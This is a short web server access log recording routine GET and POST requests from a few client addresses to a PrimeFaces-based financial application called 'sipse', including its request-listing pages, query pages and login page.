186.98.65.195 - - [07/Feb/2024:01:24:39 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 31381
186.98.65.195 - - [07/Feb/2024:01:24:40 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 31504
186.98.65.195 - - [07/Feb/2024:01:24:41 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 25823
186.98.65.195 - - [07/Feb/2024:01:24:43 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 8242
186.98.65.195 - - [07/Feb/2024:01:24:43 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 5159
186.98.65.195 - - [07/Feb/2024:01:24:46 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 149194
186.98.65.195 - - [07/Feb/2024:01:24:47 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.98.65.195 - - [07/Feb/2024:01:24:47 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.98.65.195 - - [07/Feb/2024:01:24:47 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.98.65.195 - - [07/Feb/2024:01:24:47 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [07/Feb/2024:01:24:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6dc1b97c5c24a42a7b28484f9d3a86ecf.e3iSbxaKaheRe3qKcheMbNuKc41ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
186.98.65.195 - - [07/Feb/2024:01:25:12 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 490673
186.98.65.195 - - [07/Feb/2024:01:25:21 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 2141678
186.98.65.195 - - [07/Feb/2024:01:25:28 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 2010948
186.98.65.195 - - [07/Feb/2024:01:25:32 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 2237513
201.245.192.253 - - [07/Feb/2024:01:25:34 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
201.245.192.253 - - [07/Feb/2024:01:25:34 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.98.65.195 - - [07/Feb/2024:01:25:34 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 335635
201.245.192.253 - - [07/Feb/2024:01:25:34 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12407
201.245.192.253 - - [07/Feb/2024:01:25:34 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [07/Feb/2024:01:25:34 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [07/Feb/2024:01:25:34 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [07/Feb/2024:01:25:34 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [07/Feb/2024:01:25:34 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [07/Feb/2024:01:25:34 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [07/Feb/2024:01:25:34 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [07/Feb/2024:01:25:34 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
216.245.221.92 - - [07/Feb/2024:01:25:35 -0500] "HEAD / HTTP/1.1" 200 -
186.98.65.195 - - [07/Feb/2024:01:25:30 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 10477439
186.98.65.195 - - [07/Feb/2024:01:25:37 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 647531
201.245.192.253 - - [07/Feb/2024:01:25:39 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 15572
201.245.192.253 - - [07/Feb/2024:01:25:39 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [07/Feb/2024:01:25:39 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [07/Feb/2024:01:25:39 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [07/Feb/2024:01:25:39 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [07/Feb/2024:01:25:39 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [07/Feb/2024:01:25:39 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [07/Feb/2024:01:25:39 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [07/Feb/2024:01:25:39 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
